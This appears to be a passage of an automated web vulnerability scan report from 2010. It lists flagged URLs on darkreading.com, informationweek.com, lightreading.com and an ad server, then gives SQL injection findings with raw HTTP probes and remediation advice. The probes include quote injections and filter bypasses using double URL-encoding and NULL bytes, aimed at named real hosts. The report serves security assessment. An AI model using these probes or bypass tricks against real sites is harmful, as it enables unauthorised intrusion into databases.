3.865. http://www.darkreading.com/blog/archives/2009/10/index.html [User-Agent HTTP header]

3.866. http://www.darkreading.com/blog/archives/2009/11/index.html [User-Agent HTTP header]

3.867. http://www.darkreading.com/blog/archives/2009/12/index.html [User-Agent HTTP header]

3.868. http://www.darkreading.com/blog/archives/2010/01/index.html [User-Agent HTTP header]

3.869. http://www.darkreading.com/blog/archives/2010/02/index.html [User-Agent HTTP header]

3.870. http://www.darkreading.com/blog/archives/2010/03/index.html [User-Agent HTTP header]

3.871. http://www.darkreading.com/blog/archives/2010/04/index.html [User-Agent HTTP header]

3.872. http://www.darkreading.com/blog/archives/2010/05/index.html [User-Agent HTTP header]

3.873. http://www.darkreading.com/blog/archives/2010/06/index.html [User-Agent HTTP header]

3.874. http://www.darkreading.com/blog/archives/2010/07/index.html [User-Agent HTTP header]

3.875. http://www.darkreading.com/blog/archives/2010/08/index.html [User-Agent HTTP header]

3.876. http://www.darkreading.com/blog/archives/2010/09/index.html [User-Agent HTTP header]

3.877. http://www.darkreading.com/blog/archives/2010/10/index.html [User-Agent HTTP header]

3.878. http://www.darkreading.com/blog/archives/2010/11/index.html [User-Agent HTTP header]

3.879. http://www.darkreading.com/blog/archives/2010/12/index.html [User-Agent HTTP header]

3.880. http://www.darkreading.com/blog/archives/cs-island/index.html [User-Agent HTTP header]

3.881. http://www.darkreading.com/blog/archives/dark-dominion/index.html [User-Agent HTTP header]

3.882. http://www.darkreading.com/blog/archives/evil-bytes/index.html [User-Agent HTTP header]

3.883. http://www.darkreading.com/blog/archives/evil_bytes/index.html [User-Agent HTTP header]

3.884. http://www.darkreading.com/blog/archives/hacked-off/index.html [User-Agent HTTP header]

3.885. http://www.darkreading.com/blog/archives/in-search-of-malware/index.html [User-Agent HTTP header]

3.886. http://www.darkreading.com/blog/archives/security-views/index.html [User-Agent HTTP header]

3.887. http://www.darkreading.com/blog/archives/sophoslabs-insights/index.html [User-Agent HTTP header]

3.888. http://www.darkreading.com/blog/calendar.html [User-Agent HTTP header]

3.889. http://www.darkreading.com/newsletters/subscribe.html [User-Agent HTTP header]

3.890. http://www.darkreading.com/security [User-Agent HTTP header]

3.891. http://www.darkreading.com/security/antivirus [User-Agent HTTP header]

3.892. http://www.darkreading.com/security/application-security [User-Agent HTTP header]

3.893. http://www.darkreading.com/security/article/208803634/index.html [User-Agent HTTP header]

3.894. http://www.darkreading.com/security/article/208803672/index.html [User-Agent HTTP header]

3.895. http://www.darkreading.com/security/article/220000718/index.html [User-Agent HTTP header]

3.896. http://www.darkreading.com/security/article/222200174/index.html [User-Agent HTTP header]

3.897. http://www.darkreading.com/security/article/222300840/index.html [User-Agent HTTP header]

3.898. http://www.darkreading.com/security/article/222301436/index.html [User-Agent HTTP header]

3.899. http://www.darkreading.com/security/article/222301500/index.html [User-Agent HTTP header]

3.900. http://www.darkreading.com/security/article/222600139/index.html [User-Agent HTTP header]

3.901. http://www.darkreading.com/security/article/222900286/index.html [User-Agent HTTP header]

3.902. http://www.darkreading.com/security/article/222900775/index.html [User-Agent HTTP header]

3.903. http://www.darkreading.com/security/article/223100233/index.html [User-Agent HTTP header]

3.904. http://www.darkreading.com/security/article/223100436/index.html [User-Agent HTTP header]

3.905. http://www.darkreading.com/security/article/223100902/index.html [User-Agent HTTP header]

3.906. http://www.darkreading.com/security/article/223800139/index.html [User-Agent HTTP header]

3.907. http://www.darkreading.com/security/article/223800256/index.html [User-Agent HTTP header]

3.908. http://www.darkreading.com/security/article/224200523/index.html [User-Agent HTTP header]

3.909. http://www.darkreading.com/security/article/224201355/index.html [User-Agent HTTP header]

3.910. http://www.darkreading.com/security/article/224500077/index.html [User-Agent HTTP header]

3.911. http://www.darkreading.com/security/article/224600304/index.html [User-Agent HTTP header]

3.912. http://www.darkreading.com/security/article/224700541/index.html [User-Agent HTTP header]

3.913. http://www.darkreading.com/security/article/224900081/index.html [User-Agent HTTP header]

3.914. http://www.darkreading.com/security/article/225200571/index.html [User-Agent HTTP header]

3.915. http://www.darkreading.com/security/article/225600438/index.html [User-Agent HTTP header]

3.916. http://www.darkreading.com/security/article/225700088/index.html [User-Agent HTTP header]

3.917. http://www.darkreading.com/security/article/225701534/index.html [User-Agent HTTP header]

3.918. http://www.darkreading.com/security/article/225701866/index.html [User-Agent HTTP header]

3.919. http://www.darkreading.com/security/article/225702192/index.html [User-Agent HTTP header]

3.920. http://www.darkreading.com/security/article/225702468/index.html [User-Agent HTTP header]

3.921. http://www.darkreading.com/security/article/225702839/index.html [User-Agent HTTP header]

3.922. http://www.darkreading.com/security/article/226600195/index.html [User-Agent HTTP header]

3.923. http://www.darkreading.com/security/article/226700229/index.html [User-Agent HTTP header]

3.924. http://www.darkreading.com/security/article/226700529/index.html [User-Agent HTTP header]

3.925. http://www.darkreading.com/security/article/226900007/index.html [User-Agent HTTP header]

3.926. http://www.darkreading.com/security/article/227300150/index.html [User-Agent HTTP header]

3.927. http://www.darkreading.com/security/article/227500152/index.html [User-Agent HTTP header]

3.928. http://www.darkreading.com/security/attacks-breaches [User-Agent HTTP header]

3.929. http://www.darkreading.com/security/client-security [User-Agent HTTP header]

3.930. http://www.darkreading.com/security/encryption [User-Agent HTTP header]

3.931. http://www.darkreading.com/security/nac [User-Agent HTTP header]

3.932. http://www.darkreading.com/security/perimeter-security [User-Agent HTTP header]

3.933. http://www.darkreading.com/security/privacy [User-Agent HTTP header]

3.934. http://www.darkreading.com/security/security-management [User-Agent HTTP header]

3.935. http://www.darkreading.com/security/storage-security [User-Agent HTTP header]

3.936. http://www.darkreading.com/security/vulnerabilities [User-Agent HTTP header]

3.937. http://www.informationweek.com/cloud-computing/ [User-Agent HTTP header]

3.938. http://www.informationweek.com/events/ [User-Agent HTTP header]

3.939. http://www.informationweek.com/global-cio/ [User-Agent HTTP header]

3.940. http://www.informationweek.com/news/galleries/smb/ebusiness/showArticle.jhtml [User-Agent HTTP header]

3.941. http://www.informationweek.com/news/global-cio/interviews/showArticle.jhtml [User-Agent HTTP header]

3.942. http://www.informationweek.com/news/government/policy/showArticle.jhtml [User-Agent HTTP header]

3.943. http://www.informationweek.com/news/storage/data_protection/showArticle.jhtml [User-Agent HTTP header]

3.944. http://www.informationweek.com/news/storage/systems/showArticle.jhtml [User-Agent HTTP header]

3.945. http://www.informationweek.com/newsletters/subscribe.jhtml [User-Agent HTTP header]

3.946. http://www.informationweek.com/take.jhtml [User-Agent HTTP header]

3.947. http://www.informationweek.com/video/security/21090964001 [User-Agent HTTP header]

3.948. http://www.informationweek.com/video/security/37740285001 [User-Agent HTTP header]

3.949. http://www.informationweek.com/video/security/42988833001 [User-Agent HTTP header]

3.950. http://www.informationweek.com/video/security/68553969001 [User-Agent HTTP header]

3.951. http://www.informationweek.com/whitepaper [User-Agent HTTP header]

3.952. http://www.informationweek.com/whitepaper/ [User-Agent HTTP header]

3.953. http://www.informationweek.com/whitepaper/Security [User-Agent HTTP header]

3.954. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 [User-Agent HTTP header]

3.955. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 [User-Agent HTTP header]

3.956. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/what-is-security-as-a-service-and-should-smbs-co-wp1289497389050 [User-Agent HTTP header]

3.957. http://www.informationweek.com/whitepaper/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140 [User-Agent HTTP header]

3.958. http://www.informationweek.com/whitepaper/advancedSearch/resultsCollection.jhtml [User-Agent HTTP header]

3.959. http://www.lightreading.com/ [User-Agent HTTP header]

3.960. http://www.lightreading.com/ad_redirect.asp [User-Agent HTTP header]

3.961. http://www.lightreading.com/alcatel-lucent-solution-center.asp [User-Agent HTTP header]

3.962. http://www.lightreading.com/archives.asp [User-Agent HTTP header]

3.963. http://www.lightreading.com/asia/ [User-Agent HTTP header]

3.964. http://www.lightreading.com/benchmark-surveys.asp [User-Agent HTTP header]

3.965. http://www.lightreading.com/blackberry-solution-center.asp [User-Agent HTTP header]

3.966. http://www.lightreading.com/blog.asp [User-Agent HTTP header]

3.967. http://www.lightreading.com/blog.asp [User-Agent HTTP header]

3.968. http://www.lightreading.com/calendar_reports.asp [User-Agent HTTP header]

3.969. http://www.lightreading.com/calendar_webinars.asp [User-Agent HTTP header]

3.970. http://www.lightreading.com/cisco-solution-center.asp [User-Agent HTTP header]

3.971. http://www.lightreading.com/document.asp [User-Agent HTTP header]

3.972. http://www.lightreading.com/document.asp [User-Agent HTTP header]

3.973. http://www.lightreading.com/email.asp [User-Agent HTTP header]

3.974. http://www.lightreading.com/europe [User-Agent HTTP header]

3.975. http://www.lightreading.com/europe/ [User-Agent HTTP header]

3.976. http://www.lightreading.com/events.asp [User-Agent HTTP header]

3.977. http://www.lightreading.com/in-the-news/ [User-Agent HTTP header]

3.978. http://www.lightreading.com/lg_redirect.asp [User-Agent HTTP header]

3.979. http://www.lightreading.com/lg_redirect.asp [User-Agent HTTP header]

3.980. http://www.lightreading.com/library.asp [User-Agent HTTP header]

3.981. http://www.lightreading.com/live/ [User-Agent HTTP header]

3.982. http://www.lightreading.com/live/event_information.asp [User-Agent HTTP header]

3.983. http://www.lightreading.com/login.asp [User-Agent HTTP header]

3.984. http://www.lightreading.com/lr-cable [User-Agent HTTP header]

3.985. http://www.lightreading.com/lr-cable/ [User-Agent HTTP header]

3.986. http://www.lightreading.com/lr-mobile [User-Agent HTTP header]

3.987. http://www.lightreading.com/lr-mobile/ [User-Agent HTTP header]

3.988. http://www.lightreading.com/message.asp [User-Agent HTTP header]

3.989. http://www.lightreading.com/messages.asp [User-Agent HTTP header]

3.990. http://www.lightreading.com/network-intelligence-benchmark-survey.asp [User-Agent HTTP header]

3.991. http://www.lightreading.com/policy-management/ [User-Agent HTTP header]

3.992. http://www.lightreading.com/profile.asp [User-Agent HTTP header]

3.993. http://www.lightreading.com/profile.asp [User-Agent HTTP header]

3.994. http://www.lightreading.com/quote.asp [User-Agent HTTP header]

3.995. http://www.lightreading.com/register.asp [User-Agent HTTP header]

3.996. http://www.lightreading.com/resource-library.asp [User-Agent HTTP header]

3.997. http://www.lightreading.com/search.asp [User-Agent HTTP header]

3.998. http://www.lightreading.com/section.asp [User-Agent HTTP header]

3.999. http://www.lightreading.com/topics.asp [User-Agent HTTP header]

3.1000. http://www.lightreading.com/topics.asp [User-Agent HTTP header]

3.1001. http://www.lightreading.com/webinar_archives.asp [User-Agent HTTP header]

3.1002. http://www.lightreading.com/webinars.asp [User-Agent HTTP header]

3.1003. http://www.ondemanditgovernance.techweb.com/util/download.jhtml [User-Agent HTTP header]

3.1004. http://analytics.informationweek.com/ [name of an arbitrarily supplied request parameter]

3.1005. http://ar.voicefive.com/b/node_rcAll.pli [BMX_3PC cookie]

3.1006. http://ar.voicefive.com/b/node_rcAll.pli [BMX_BR cookie]

3.1007. http://ar.voicefive.com/b/node_rcAll.pli [BMX_G cookie]

3.1008. http://ar.voicefive.com/b/node_rcAll.pli [UID cookie]

3.1009. http://ar.voicefive.com/b/node_rcAll.pli [ar_70821733 cookie]

3.1010. http://ar.voicefive.com/b/node_rcAll.pli [ar_p43112268 cookie]

3.1011. http://ar.voicefive.com/b/node_rcAll.pli [ar_p70821733 cookie]

3.1012. http://ar.voicefive.com/b/node_rcAll.pli [ar_p72213098 cookie]

3.1013. http://ar.voicefive.com/b/node_rcAll.pli [ar_p76230671 cookie]

3.1014. http://ar.voicefive.com/b/node_rcAll.pli [ar_p76459327 cookie]

3.1015. http://ar.voicefive.com/b/node_rcAll.pli [ar_p76910469 cookie]

3.1016. http://ar.voicefive.com/bmx3/node.pli [BMX_3PC cookie]

3.1017. http://ar.voicefive.com/bmx3/node.pli [BMX_BR cookie]

3.1018. http://ar.voicefive.com/bmx3/node.pli [UID cookie]

3.1019. http://ar.voicefive.com/bmx3/node.pli [ar_70821733 cookie]

3.1020. http://ar.voicefive.com/bmx3/node.pli [ar_p43112268 cookie]

3.1021. http://ar.voicefive.com/bmx3/node.pli [ar_p70821733 cookie]

3.1022. http://ar.voicefive.com/bmx3/node.pli [ar_p72213098 cookie]

3.1023. http://ar.voicefive.com/bmx3/node.pli [ar_p76230671 cookie]

3.1024. http://ar.voicefive.com/bmx3/node.pli [ar_p76459327 cookie]

3.1025. http://ar.voicefive.com/bmx3/node.pli [ar_p76910469 cookie]

3.1026. http://www.darkreading.com/ [User-Agent HTTP header]

3.1027. http://www.darkreading.com/ [name of an arbitrarily supplied request parameter]



1. SQL injection  next
There are 77 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://adserver.adtechus.com/addyn/3.0/5242.1/1183258/0/225/ADTECH [Referer HTTP header]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5242.1/1183258/0/225/ADTECH

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /addyn/3.0/5242.1/1183258/0/225/ADTECH;alias=DarkReading_Blogs_Top_728x90;key=/blog/archives/evil-bytes/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=1292112011;misc=1292111961408 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CBBAA326E651A44E171CE41F001514E

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19230

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_1183102(i) {
var sVersion_1183102 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn/3.0/5242.1/1183258/0/225/ADTECH;alias=DarkReading_Blogs_Top_728x90;key=/blog/archives/evil-bytes/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=1292112011;misc=1292111961408 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CBBAA326E651A44E171CE41F001514E

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 702

document.write("<scr"+"ipt language=\"JavaScript\" type=\"text/javascript\" src=\"http://view.atdmt.com/DAP/jview/253171888/direct/01?117805817click=http://adserver.adtechus.com/adlink/5242/1183102/0/
...[SNIP]...

1.2. http://adserver.adtechus.com/addyn/3.0/5242.1/1200449/0/225/ADTECH [JEB2 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5242.1/1200449/0/225/ADTECH

Issue detail

The JEB2 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JEB2 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /addyn/3.0/5242.1/1200449/0/225/ADTECH;alias=InformationWeek_Blog_GlobalCIO_Bottom_728x90;key=global_cio+/blog/main/archives/global_cio/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=942859226;misc=1292112032219 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/blog/main/archives/global_cio/index.html;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN?subSection=global_cio
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CBBAA326E651A44E171CE41F001514E%00'

Response 1 (redirected)

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19359

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_1200270(i) {
var sVersion_1200270 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn/3.0/5242.1/1200449/0/225/ADTECH;alias=InformationWeek_Blog_GlobalCIO_Bottom_728x90;key=global_cio+/blog/main/archives/global_cio/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=942859226;misc=1292112032219 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/blog/main/archives/global_cio/index.html;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN?subSection=global_cio
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CBBAA326E651A44E171CE41F001514E%00''

Response 2 (redirected)

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 332

document.write('<a href="http://adserver.adtechus.com/?adlink/5242/1200270/0/225/AdId=980572;BnId=1;itime=117814650;key=global_cio+/blog/main/archives/global_cio/index;" target=_blank><img src="http:/
...[SNIP]...

1.3. http://www.informationweek.com/ [iwkbtn_emc_101111 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /

Issue detail

The iwkbtn_emc_101111 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_emc_101111 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET / HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%00'; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:09 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:09 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 105998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m
...[SNIP]...
<p>
Security experts warn those considering joining the pro-WikiLeaks army that it's very easy to trace those who participate in the illegal denial...</p>
...[SNIP]...
<P>
Microsoft&#8217;s failure to get consumer-friendly tablets in stores for the holiday season could result in a frosty year-end quarter for the...</p>
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%00''; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:20:12 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:12 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.4. http://www.informationweek.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:36 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:36 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 106016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m
...[SNIP]...
<p>
Security experts warn those considering joining the pro-WikiLeaks army that it's very easy to trace those who participate in the illegal denial...</p>
...[SNIP]...
<P>
Microsoft&#8217;s failure to get consumer-friendly tablets in stores for the holiday season could result in a frosty year-end quarter for the...</p>
...[SNIP]...

Request 2

GET /?1''=1 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2 (redirected)

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:20:39 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:39 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.5. http://www.informationweek.com/blog/main/archives/david_berlinds_tech_radar/index.html [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /blog/main/archives/david_berlinds_tech_radar/index.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/main/archives/david_berlinds_tech_radar/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:31 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:31 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 173030


